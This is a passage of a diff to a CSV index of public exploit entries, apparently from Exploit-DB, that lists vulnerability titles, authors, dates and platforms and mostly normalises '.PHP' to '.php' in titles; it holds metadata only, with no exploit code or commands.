XSS",2006-11-03,AL-garnei,php,webapps,0 @@ -25939,14 +25939,14 @@ id,file,description,date,author,platform,type,port 28904,platforms/php/webapps/28904.txt,"ac4p Mobile up.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 28905,platforms/php/webapps/28905.txt,"ac4p Mobile cp/index.php pagenav Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 28906,platforms/php/webapps/28906.txt,"Simplog 0.9.3 BlogID Parameter - Multiple SQL Injection Vulnerabilities",2006-11-03,"Benjamin Moss",php,webapps,0 -28907,platforms/php/webapps/28907.txt,"Simplog 0.9.3 Archive.PHP PID Parameter Cross-Site Scripting Vulnerability",2006-11-03,"Benjamin Moss",php,webapps,0 -28908,platforms/php/webapps/28908.txt,"Advanced GuestBook 2.3.1 Admin.PHP Remote File Include Vulnerability",2006-11-03,BrokeN-ProXy,php,webapps,0 -28909,platforms/php/webapps/28909.txt,"IF-CMS Index.PHP Cross-Site Scripting Vulnerability",2006-11-04,"Benjamin Moss",php,webapps,0 -28910,platforms/php/webapps/28910.pl,"PHPKit 1.6.1 Popup.PHP SQL Injection Vulnerability",2006-11-04,x23,php,webapps,0 +28907,platforms/php/webapps/28907.txt,"Simplog 0.9.3 Archive.php PID Parameter Cross-Site Scripting Vulnerability",2006-11-03,"Benjamin Moss",php,webapps,0 +28908,platforms/php/webapps/28908.txt,"Advanced GuestBook 2.3.1 Admin.php Remote File Include Vulnerability",2006-11-03,BrokeN-ProXy,php,webapps,0 +28909,platforms/php/webapps/28909.txt,"IF-CMS Index.php Cross-Site Scripting Vulnerability",2006-11-04,"Benjamin Moss",php,webapps,0 +28910,platforms/php/webapps/28910.pl,"PHPKit 1.6.1 Popup.php SQL Injection Vulnerability",2006-11-04,x23,php,webapps,0 28911,platforms/solaris/dos/28911.txt,"Sun Solaris 10 UFS Local Denial of Service Vulnerability",2006-11-04,LMH,solaris,dos,0 -28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 Install.PHP3 - Remote File Include Vulnerability",2006-11-06,Mahmood_ali,php,webapps,0 -28914,platforms/php/webapps/28914.txt,"Xoops 2.0.5 NewList.PHP Cross-Site Scripting Vulnerability",2006-11-06,CvIr.System,php,webapps,0 -28915,platforms/php/webapps/28915.txt,"Article Script 1.6.3 RSS.PHP SQL Injection Vulnerability",2006-11-06,Liz0ziM,php,webapps,0 +28913,platforms/php/webapps/28913.txt,"@cid Stats 2.3 Install.php3 - Remote File Include Vulnerability",2006-11-06,Mahmood_ali,php,webapps,0 +28914,platforms/php/webapps/28914.txt,"Xoops 2.0.5 NewList.php Cross-Site Scripting Vulnerability",2006-11-06,CvIr.System,php,webapps,0 +28915,platforms/php/webapps/28915.txt,"Article Script 1.6.3 RSS.php SQL Injection Vulnerability",2006-11-06,Liz0ziM,php,webapps,0 28916,platforms/windows/remote/28916.rb,"America Online ICQ 5.1 - ActiveX Control Remote Code Execution Vulnerability",2006-11-06,"Peter Vreugdenhil",windows,remote,0 28912,platforms/linux/dos/28912.txt,"Linux Kernel 2.6.x ISO9660 - Denial of Service Vulnerability",2006-11-05,LMH,linux,dos,0 28917,platforms/php/webapps/28917.txt,"AIOCP 1.3.x cp_forum_view.php Multiple Parameter XSS",2006-11-06,"laurent gaffie",php,webapps,0 @@ -25970,9 +25970,9 @@ id,file,description,date,author,platform,type,port 28935,platforms/php/webapps/28935.txt,"AIOCP 1.3.x cp_dpage.php Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0 28936,platforms/php/webapps/28936.txt,"AIOCP 1.3.x cp_show_ec_products.php Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0 28937,platforms/php/webapps/28937.txt,"AIOCP 1.3.x cp_show_page_help.php Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0 -28938,platforms/php/webapps/28938.txt,"IPManager 2.3 Index.PHP Cross-Site Scripting Vulnerability",2006-11-07,spaceballyopsolo,php,webapps,0 -28939,platforms/php/webapps/28939.txt,"Kayako SupportSuite 3.0.32 Index.PHP Cross-Site Scripting Vulnerability",2006-11-07,Dr.HAiL,php,webapps,0 -28940,platforms/php/webapps/28940.txt,"PHPMyChat 0.14/0.15 Languages.Lib.PHP Local File Include Vulnerability",2006-11-08,ajann,php,webapps,0 +28938,platforms/php/webapps/28938.txt,"IPManager 2.3 Index.php Cross-Site Scripting Vulnerability",2006-11-07,spaceballyopsolo,php,webapps,0 +28939,platforms/php/webapps/28939.txt,"Kayako SupportSuite 3.0.32 Index.php Cross-Site Scripting Vulnerability",2006-11-07,Dr.HAiL,php,webapps,0 +28940,platforms/php/webapps/28940.txt,"PHPMyChat 0.14/0.15 Languages.Lib.php Local File Include Vulnerability",2006-11-08,ajann,php,webapps,0 28941,platforms/asp/webapps/28941.txt,"Immediacy .NET CMS 5.2 Logon.ASPX Cross-Site Scripting Vulnerability",2006-11-08,"Gemma Hughes",asp,webapps,0 28942,platforms/php/webapps/28942.txt,"FreeWebshop 2.1/2.2 index.php page Parameter Traversal Arbitrary File Access",2006-11-08,"laurent gaffie",php,webapps,0 28943,platforms/php/webapps/28943.txt,"FreeWebshop 2.1/2.2 index.php cat Parameter XSS",2006-11-08,"laurent gaffie",php,webapps,0 @@ -25997,13 +25997,13 @@ id,file,description,date,author,platform,type,port 28963,platforms/php/webapps/28963.txt,"Bitweaver 1.x fisheye/index.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x wiki/orphan_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x wiki/list_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 -28966,platforms/php/webapps/28966.txt,"Drake CMS 0.2 Index.PHP Cross-Site Scripting Vulnerability",2006-11-10,CorryL,php,webapps,0 -28967,platforms/php/webapps/28967.txt,"ExoPHPdesk 1.2 Pipe.PHP Remote File Include Vulnerability",2006-11-11,Firewall1954,php,webapps,0 +28966,platforms/php/webapps/28966.txt,"Drake CMS 0.2 Index.php Cross-Site Scripting Vulnerability",2006-11-10,CorryL,php,webapps,0 +28967,platforms/php/webapps/28967.txt,"ExoPHPdesk 1.2 Pipe.php Remote File Include Vulnerability",2006-11-11,Firewall1954,php,webapps,0 28968,platforms/windows/remote/28968.html,"Aladdin Knowledge Systems Ltd. PrivAgent ActiveX Control Overflow",2013-10-15,blake,windows,remote,0 28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - SEH Buffer Overflow",2013-10-15,metacom,windows,local,0 28970,platforms/php/webapps/28970.txt,"Dexs PM System WordPress Plugin - Authenticated Persistent XSS (0day)",2013-10-15,TheXero,php,webapps,80 28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 (exportcsv.php sondage param) - SQL Injection",2013-10-15,drone,php,webapps,80 -28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection and Remote Code Execution",2013-10-15,"Jason Kratzer",unix,webapps,0 +28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution",2013-10-15,"Jason Kratzer",unix,webapps,0 28973,platforms/windows/remote/28973.rb,"HP Data Protector Cell Request Service Buffer Overflow",2013-10-15,metasploit,windows,remote,0 28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080)",2013-10-15,metasploit,windows,remote,0 28975,platforms/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0 @@ -26011,7 +26011,7 @@ id,file,description,date,author,platform,type,port 28977,platforms/ios/webapps/28977.txt,"UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0 28978,platforms/ios/webapps/28978.txt,"Apple iOS 7.0.2 - Sim Lock Screen Display Bypass Vulnerability",2013-10-15,Vulnerability-Lab,ios,webapps,0 28979,platforms/linux/webapps/28979.txt,"DornCMS Application 1.4 - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,linux,webapps,0 -28980,platforms/php/webapps/28980.txt,"WordPress 2.0.5 Functions.PHP - Remote File Include Vulnerability",2006-11-11,_ANtrAX_,php,webapps,0 +28980,platforms/php/webapps/28980.txt,"WordPress 2.0.5 Functions.php - Remote File Include Vulnerability",2006-11-11,_ANtrAX_,php,webapps,0 28981,platforms/multiple/remote/28981.txt,"IBM WebSphere 6.0 Faultactor Cross-Site Scripting Vulnerability",2006-11-13,"Nuri Fattah",multiple,remote,0 28982,platforms/php/webapps/28982.txt,"cPanel 10 seldir.html dir Parameter XSS",2006-11-13,"Aria-Security Team",php,webapps,0 28983,platforms/php/webapps/28983.txt,"cPanel 10 newuser.html Multiple Parameter XSS",2006-11-13,"Aria-Security Team",php,webapps,0 @@ -26019,7 +26019,7 @@ id,file,description,date,author,platform,type,port 28985,platforms/asp/webapps/28985.txt,"20/20 Real Estate 3.2 Listings.ASP SQL Injection Vulnerability",2006-11-14,"Aria-Security Team",asp,webapps,0 28986,platforms/asp/webapps/28986.asp,"ASP Portal 2.0/3.x/4.0 Default1.ASP SQL Injection Vulnerability",2006-11-13,ajann,asp,webapps,0 28987,platforms/multiple/remote/28987.c,"Digipass Go3 Insecure Encryption Vulnerability",2006-11-13,faypou,multiple,remote,0 -28988,platforms/php/webapps/28988.txt,"Roundcube Webmail 0.1 index.PHP Cross-Site Scripting Vulnerability",2006-11-13,RSnake,php,webapps,0 +28988,platforms/php/webapps/28988.txt,"Roundcube Webmail 0.1 index.php Cross-Site Scripting Vulnerability",2006-11-13,RSnake,php,webapps,0 28989,platforms/asp/webapps/28989.txt,"INFINICART search.asp search Parameter XSS",2006-11-13,"laurent gaffie",asp,webapps,0 28990,platforms/asp/webapps/28990.txt,"INFINICART sendpassword.asp email Parameter XSS",2006-11-13,"laurent gaffie",asp,webapps,0 28991,platforms/asp/webapps/28991.txt,"INFINICART login.asp Multiple Parameter XSS",2006-11-13,"laurent gaffie",asp,webapps,0 @@ -26033,7 +26033,7 @@ id,file,description,date,author,platform,type,port 29153,platforms/asp/webapps/29153.txt,"JiRos Link Manager 1.0 viewlinks.asp CategoryID Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 29154,platforms/asp/webapps/29154.txt,"CreaDirectory 1.2 - search.asp category Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 29155,platforms/asp/webapps/29155.txt,"CreaDirectory 1.2 addlisting.asp cat Parameter XSS",2006-11-21,"laurent gaffie",asp,webapps,0 -28998,platforms/php/webapps/28998.txt,"Phpdebug 1.1 Debug_test.PHP Remote File Include Vulnerability",2006-11-12,Firewall,php,webapps,0 +28998,platforms/php/webapps/28998.txt,"Phpdebug 1.1 Debug_test.php Remote File Include Vulnerability",2006-11-12,Firewall,php,webapps,0 28999,platforms/php/webapps/28999.txt,"DirectAdmin 1.28/1.29 CMD_SHOW_RESELLER user Parameter XSS",2006-11-12,"Aria-Security Team",php,webapps,0 29000,platforms/php/webapps/29000.txt,"DirectAdmin 1.28/1.29 CMD_SHOW_USER user Parameter XSS",2006-11-12,"Aria-Security Team",php,webapps,0 29001,platforms/php/webapps/29001.txt,"DirectAdmin 1.28/1.29 CMD_TICKET_CREATE TYPE Parameter XSS",2006-11-12,"Aria-Security Team",php,webapps,0 @@ -26082,19 +26082,19 @@ id,file,description,date,author,platform,type,port 29046,platforms/asp/webapps/29046.txt,"ASPIntranet 2.1 Mutiple SQL Injection Vulnerabilities",2006-11-15,"Aria-Security Team",asp,webapps,0 29047,platforms/php/webapps/29047.txt,"Hot Links Perl PHP Information Disclosure Vulnerability",2006-11-15,hack2prison,php,webapps,0 29048,platforms/asp/webapps/29048.txt,"i-Gallery 3.4 igallery.asp Multiple Parameter XSS",2006-11-16,"Aria-Security Team",asp,webapps,0 -29049,platforms/php/webapps/29049.txt,"BlogTorrent Preview 0.92 Announce.PHP Cross-Site Scripting Vulnerability",2006-11-16,the_Edit0r,php,webapps,0 -29050,platforms/php/webapps/29050.txt,"Odysseus Blog 1.0 Blog.PHP Cross-Site Scripting Vulnerability",2006-11-16,the_Edit0r,php,webapps,0 +29049,platforms/php/webapps/29049.txt,"BlogTorrent Preview 0.92 Announce.php Cross-Site Scripting Vulnerability",2006-11-16,the_Edit0r,php,webapps,0 +29050,platforms/php/webapps/29050.txt,"Odysseus Blog 1.0 Blog.php Cross-Site Scripting Vulnerability",2006-11-16,the_Edit0r,php,webapps,0 29051,platforms/php/webapps/29051.txt,"Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,the_Edit0r,php,webapps,0 -29052,platforms/php/webapps/29052.txt,"Bloo 1.00 Googlespell_Proxy.PHP Cross-Site Scripting Vulnerability",2006-11-16,the_Edit0r,php,webapps,0 +29052,platforms/php/webapps/29052.txt,"Bloo 1.00 Googlespell_Proxy.php Cross-Site Scripting Vulnerability",2006-11-16,the_Edit0r,php,webapps,0 29053,platforms/asp/webapps/29053.txt,"Image gallery with Access Database dispimage.asp id Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 29054,platforms/asp/webapps/29054.txt,"Image gallery with Access Database default.asp Multiple Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 29055,platforms/php/webapps/29055.txt,"Eggblog 3.1 admin/articles.php edit Parameter XSS",2006-11-16,the_Edit0r,php,webapps,0 29056,platforms/php/webapps/29056.txt,"Eggblog 3.1 admin/comments.php edit Parameter XSS",2006-11-16,the_Edit0r,php,webapps,0 29057,platforms/php/webapps/29057.txt,"Eggblog 3.1 admin/users.php add Parameter XSS",2006-11-16,the_Edit0r,php,webapps,0 -29058,platforms/php/webapps/29058.txt,"PhpMyAdmin 2.x db_create.php db Parameter XSS",2006-09-15,"laurent gaffie",php,webapps,0 -29059,platforms/php/webapps/29059.txt,"PhpMyAdmin 2.x db_operations.php Multiple Parameter XSS",2006-09-15,"laurent gaffie",php,webapps,0 -29060,platforms/php/webapps/29060.txt,"PhpMyAdmin 2.x querywindow.php Multiple Parameter XSS",2006-09-15,"laurent gaffie",php,webapps,0 -29061,platforms/php/webapps/29061.txt,"PhpMyAdmin 2.x sql.php pos Parameter XSS",2006-09-15,"laurent gaffie",php,webapps,0 +29058,platforms/php/webapps/29058.txt,"phpMyAdmin 2.x - db_create.php db Parameter XSS",2006-09-15,"laurent gaffie",php,webapps,0 +29059,platforms/php/webapps/29059.txt,"phpMyAdmin 2.x - db_operations.php Multiple Parameter XSS",2006-09-15,"laurent gaffie",php,webapps,0 +29060,platforms/php/webapps/29060.txt,"phpMyAdmin 2.x - querywindow.php Multiple Parameter XSS",2006-09-15,"laurent gaffie",php,webapps,0 +29061,platforms/php/webapps/29061.txt,"phpMyAdmin 2.x - sql.php pos Parameter XSS",2006-09-15,"laurent gaffie",php,webapps,0 29062,platforms/php/webapps/29062.txt,"phpMyAdmin 2.x - Multiple Script Array Handling Path Disclosure",2006-09-15,"laurent gaffie",php,webapps,0 29063,platforms/asp/webapps/29063.txt,"Xtreme ASP Photo Gallery 2.0 displaypic.asp sortorder Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 29064,platforms/asp/webapps/29064.txt,"Xtreme ASP Photo Gallery 2.0 displaypic.asp catname Parameter XSS",2006-11-16,"Aria-Security Team",asp,webapps,0 @@ -26102,7 +26102,7 @@ id,file,description,date,author,platform,type,port 29150,platforms/php/webapps/29150.txt,"WordPress SAICO Theme 1.0-1.0.2 - Arbitrary File Upload Vulnerability",2013-10-24,"Byakuya Kouta",php,webapps,0 29148,platforms/windows/dos/29148.txt,"ASF Demux for VLC 2.0.x - DoS (POC)",2013-10-23,"Pedro Ribeiro",windows,dos,0 29221,platforms/cgi/webapps/29221.txt,"BlueSocket BSC 2100 5.0/5.1 Admin.PL Cross-Site Scripting Vulnerability",2006-12-04,"Jesus Olmos Gonzalez",cgi,webapps,0 -29222,platforms/php/webapps/29222.txt,"Cerberus Helpdesk 2.x Spellwin.PHP Cross-Site Scripting Vulnerability",2006-12-04,"En Douli",php,webapps,0 +29222,platforms/php/webapps/29222.txt,"Cerberus Helpdesk 2.x Spellwin.php Cross-Site Scripting Vulnerability",2006-12-04,"En Douli",php,webapps,0 29068,platforms/php/webapps/29068.txt,"WordPress Area53 theme - Arbitrary File Upload Vulnerability",2013-10-19,"Byakuya Kouta",php,webapps,80 29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver (kmxfw.sys) Local Privilege Escalation",2006-11-16,"Ruben Santamarta ",windows,local,0 29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver (kmxstart.sys) Local Privilege Escalation",2006-11-16,"Ruben Santamarta ",windows,local,0 @@ -26114,7 +26114,7 @@ id,file,description,date,author,platform,type,port 29076,platforms/windows/dos/29076.html,"Adobe Reader 7.0.x - Multiple Vulnerabilities",2006-11-17,"Michal Bucko",windows,dos,0 29077,platforms/asp/webapps/29077.txt,"20/20 Applications Data Shed 1.0 f-email.asp itemID Parameter SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0 29078,platforms/asp/webapps/29078.txt,"20/20 Applications Data Shed 1.0 listings.asp Multiple Parameter SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0 -29079,platforms/php/webapps/29079.txt,"VBulletin 3.6.x Admin Control Panel Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-11-17,insanity,php,webapps,0 +29079,platforms/php/webapps/29079.txt,"VBulletin 3.6.x Admin Control Panel Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-11-17,insanity,php,webapps,0 29080,platforms/asp/webapps/29080.txt,"BestWebApp Dating Site Login Component Multiple Field SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0 29081,platforms/asp/webapps/29081.txt,"BestWebApp Dating Site login_form.asp msg Parameter XSS",2006-11-17,"laurent gaffie",asp,webapps,0 29085,platforms/asp/webapps/29085.txt,"A-CART 2.0 category.asp catcode Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 @@ -26130,7 +26130,7 @@ id,file,description,date,author,platform,type,port 29118,platforms/asp/webapps/29118.txt,"Enthrallweb eClassifieds ad.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29093,platforms/asp/webapps/29093.txt,"Texas Rankem player.asp selPlayer Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 29094,platforms/asp/webapps/29094.txt,"Texas Rankem tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 -29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 List.PHP Cross-Site Scripting Vulnerability",2006-11-18,Katatafish,php,webapps,0 +29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 List.php Cross-Site Scripting Vulnerability",2006-11-18,Katatafish,php,webapps,0 29096,platforms/windows/remote/29096.rb,"NetGear MA521 Wireless Driver 5.148.724 Long Beacon Probe Buffer Overflow Vulnerability",2006-11-18,"Laurent Butti",windows,remote,0 29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin Index.php Remote File Include Vulnerability",2006-11-20,S.W.A.T.,php,webapps,0 29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 /admin/admincore.php msg Parameter XSS",2006-11-20,the_Edit0r,php,webapps,0 @@ -26172,7 +26172,7 @@ id,file,description,date,author,platform,type,port 29135,platforms/asp/webapps/29135.txt,"Rapid Classified 3.1 - search.asp SH1 Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29136,platforms/asp/webapps/29136.txt,"Rapid Classified 3.1 reply.asp Multiple Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29137,platforms/asp/webapps/29137.txt,"Rapid Classified 3.1 - advsearch.asp DoSearch Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 -29157,platforms/php/webapps/29157.txt,"Seditio 1.10 Users.Profile.Inc.PHP SQL Injection Vulnerability",2006-11-21,"Mustafa Can Bjorn",php,webapps,0 +29157,platforms/php/webapps/29157.txt,"Seditio 1.10 Users.Profile.Inc.php SQL Injection Vulnerability",2006-11-21,"Mustafa Can Bjorn",php,webapps,0 29158,platforms/php/webapps/29158.txt,"CuteNews 1.4.5 show_news.php Query String XSS",2006-11-21,"Alireza Hassani",php,webapps,0 29159,platforms/php/webapps/29159.txt,"CuteNews 1.4.5 rss.php rss_title Parameter XSS",2006-11-21,"Alireza Hassani",php,webapps,0 29160,platforms/linux/remote/29160.c,"GNU Tar 1.1x GNUTYPE_NAMES Remote Directory Traversal Vulnerability",2006-11-21,"Teemu Salmela",linux,remote,0 @@ -26186,7 +26186,7 @@ id,file,description,date,author,platform,type,port 29161,platforms/osx/dos/29161.txt,"Apple Mac OS X 10.4.8 UDTO Disk Image Remote Denial of Service Vulnerability",2006-11-21,LMH,osx,dos,0 29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - Weblog.php Cross-Site Scripting Vulnerability",2006-11-21,the_Edit0r,php,webapps,0 29217,platforms/php/webapps/29217.txt,"CuteNews 1.3.6 Result Parameter Cross-Site Scripting Vulnerability",2006-12-02,Detefix,php,webapps,0 -29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 Link_Temp.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-12-02,Detefix,php,webapps,0 +29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 Link_Temp.php Multiple Cross-Site Scripting Vulnerabilities",2006-12-02,Detefix,php,webapps,0 29219,platforms/asp/webapps/29219.txt,"DUdownload 1.0/1.1 detail.asp Multiple Parameter SQL Injection",2006-12-02,"Aria-Security Team",asp,webapps,0 29220,platforms/asp/webapps/29220.html,"Metyus Okul Yonetim 1.0 Sistemi Uye_giris_islem.ASP SQL Injection Vulnerability",2006-12-04,ShaFuck31,asp,webapps,0 29164,platforms/windows/dos/29164.cpp,"FortKnox Personal Firewall 9.0.305.0 & 10.0.305.0 - Kernel Driver (fortknoxfw.sys) Memory Corruption Vulnerability",2013-10-24,"Arash Allebrahim",windows,dos,0 @@ -26201,9 +26201,9 @@ id,file,description,date,author,platform,type,port 29172,platforms/windows/dos/29172.txt,"Microsoft Office 97 HTMLMARQ.OCX Library Denial of Service Vulnerability",2006-11-22,"Michal Bucko",windows,dos,0 29173,platforms/php/webapps/29173.txt,"Active PHP Bookmarks 1.1.2 - APB_SETTINGS['apb_path'] Multiple Remote File Include Vulnerabilities",2006-11-23,ThE-LoRd-Of-CrAcKiNg,php,webapps,0 29174,platforms/asp/webapps/29174.txt,"MidiCart ASP Item_Show.ASP ID2006quant Parameter SQL Injection Vulnerability",2006-11-24,"Aria-Security Team",asp,webapps,0 -29175,platforms/php/webapps/29175.txt,"Simple PHP Gallery 1.1 System SP_Index.PHP Cross-Site Scripting Vulnerability",2006-11-24,"Al7ejaz Hacker",php,webapps,0 +29175,platforms/php/webapps/29175.txt,"Simple PHP Gallery 1.1 System SP_Index.php Cross-Site Scripting Vulnerability",2006-11-24,"Al7ejaz Hacker",php,webapps,0 29176,platforms/asp/webapps/29176.txt,"ASP ListPics 5.0 Listpics.ASP SQL Injection Vulnerability",2006-11-24,"Aria-Security Team",asp,webapps,0 -29177,platforms/php/webapps/29177.txt,"MMGallery 1.55 Thumbs.PHP Cross-Site Scripting Vulnerability",2006-11-24,"Al7ejaz Hacker",php,webapps,0 +29177,platforms/php/webapps/29177.txt,"MMGallery 1.55 Thumbs.php Cross-Site Scripting Vulnerability",2006-11-24,"Al7ejaz Hacker",php,webapps,0 29178,platforms/asp/webapps/29178.txt,"Fixit iDms Pro Image Gallery filelist.asp Multiple Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29179,platforms/asp/webapps/29179.txt,"Fixit iDms Pro Image Gallery showfile.asp fid Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29180,platforms/asp/webapps/29180.txt,"SIAP CMS Login.ASP SQL Injection Vulnerability",2006-11-25,nagazakig74,asp,webapps,0 @@ -26228,10 +26228,10 @@ id,file,description,date,author,platform,type,port 29199,platforms/php/webapps/29199.txt,"b2evolution 1.8.2/1.9 _410_stats_gone.page.php app_name Parameter XSS",2006-11-16,"lotto fischer",php,webapps,0 29200,platforms/php/webapps/29200.txt,"b2evolution 1.8.2/1.9 _referer_spam.page.php Multiple Parameter XSS",2006-11-16,"lotto fischer",php,webapps,0 29201,platforms/osx/local/29201.c,"Apple Mac OS X 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption Vulnerability",2006-11-29,LMH,osx,local,0 -29202,platforms/php/webapps/29202.txt,"Seditio1.10 /Land Down 8.0 Under Polls.PHP SQL Injection Vulnerability",2006-11-30,ajann,php,webapps,0 -29203,platforms/php/webapps/29203.php,"Woltlab Burning Board 2.3.x Register.PHP Cross-Site Scripting Vulnerability",2006-11-30,blueshisha,php,webapps,0 +29202,platforms/php/webapps/29202.txt,"Seditio1.10 /Land Down 8.0 Under Polls.php SQL Injection Vulnerability",2006-11-30,ajann,php,webapps,0 +29203,platforms/php/webapps/29203.php,"Woltlab Burning Board 2.3.x Register.php Cross-Site Scripting Vulnerability",2006-11-30,blueshisha,php,webapps,0 29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 Ftpd and Tnftpd Port Remote Buffer Overflow Vulnerability",2006-12-01,kcope,netbsd_x86,dos,0 -29205,platforms/php/webapps/29205.txt,"Invision Gallery 2.0.7 Index.PHP IMG Parameter SQL Injection Vulnerability",2006-12-01,infection,php,webapps,0 +29205,platforms/php/webapps/29205.txt,"Invision Gallery 2.0.7 Index.php IMG Parameter SQL Injection Vulnerability",2006-12-01,infection,php,webapps,0 29262,platforms/hardware/webapps/29262.pl,"Pirelli Discus DRG A125g - Password Disclosure Vulnerability",2013-10-28,"Sebastián Magof",hardware,webapps,0 29207,platforms/php/webapps/29207.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - Show Parameter SQL Injection Vulnerability",2006-12-01,"Tim Weber",php,webapps,0 29231,platforms/asp/webapps/29231.txt,"Dol Storye Dettaglio.ASP Multiple SQL Injection Vulnerabilities",2006-12-06,WarGame,asp,webapps,0 @@ -26240,7 +26240,7 @@ id,file,description,date,author,platform,type,port 29234,platforms/windows/local/29234.py,"VideoCharge Studio 2.12.3.685 - Buffer Overflow (SEH)",2013-10-27,metacom,windows,local,0 29210,platforms/php/remote/29210.rb,"Open Flash Chart 2 - Arbitrary File Upload",2013-10-26,metasploit,php,remote,80 29230,platforms/windows/remote/29230.html,"Citrix Presentation Server Client 9.200 - WFICA.OCX ActiveX Component Heap Buffer Overflow Vulnerability",2006-12-06,"Andrew Christensen",windows,remote,0 -29223,platforms/php/webapps/29223.txt,"Inside Systems Mail 2.0 Error.PHP Cross-Site Scripting Vulnerability",2006-12-04,"Vicente Aguilera Diaz",php,webapps,0 +29223,platforms/php/webapps/29223.txt,"Inside Systems Mail 2.0 Error.php Cross-Site Scripting Vulnerability",2006-12-04,"Vicente Aguilera Diaz",php,webapps,0 29224,platforms/asp/webapps/29224.txt,"UApplication UGuestbook 1.0 Index.ASP SQL Injection Vulnerability",2006-12-04,"Aria-Security Team",asp,webapps,0 29225,platforms/php/webapps/29225.txt,"ac4p Mobile up.php Taaa Parameter XSS",2006-12-04,SwEET-DeViL,php,webapps,0 29226,platforms/php/webapps/29226.txt,"ac4p Mobile polls.php Multiple Parameter XSS",2006-12-04,SwEET-DeViL,php,webapps,0 @@ -26290,19 +26290,19 @@ id,file,description,date,author,platform,type,port 29286,platforms/windows/dos/29286.txt,"Microsoft Windows Explorer explorer.exe WMV File Handling DoS",2006-12-15,shinnai,windows,dos,0 29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall HIPS Process Spoofing Vulnerability",2006-12-15,"Matousec Transparent security",windows,dos,0 29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0 -29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 Fusion_Forum_View.PHP Local File Include Vulnerability",2006-12-16,Kacper,php,webapps,0 +29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 Fusion_Forum_View.php Local File Include Vulnerability",2006-12-16,Kacper,php,webapps,0 29290,platforms/php/remote/29290.c,"Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,php,remote,80 29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 Haber.ASP SQL Injection Vulnerability",2006-12-16,ShaFuck31,asp,webapps,0 29294,platforms/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 Shout.php HTML Injection Vulnerability",2006-12-18,IMHOT3B,php,webapps,0 29295,platforms/windows/dos/29295.html,"Microsoft Outlook ActiveX Control Remote Internet Explorer Denial of Service Vulnerability",2006-12-18,shinnai,windows,dos,0 29296,platforms/linux/dos/29296.txt,"KDE LibkHTML 4.2 NodeType Function Denial of Service Vulnerability",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0 29297,platforms/hardware/dos/29297.py,"HP Printer FTP Print Server 2.4.5 List Command Buffer Overflow Vulnerability",2006-12-19,"Joxean Koret",hardware,dos,0 -29298,platforms/php/webapps/29298.txt,"OSTicket 1.2/1.3 Support Cards View.PHP Cross-Site Scripting Vulnerability",2006-12-19,"Hacker CooL",php,webapps,0 -29299,platforms/php/webapps/29299.txt,"Mini Web Shop 2.1.c 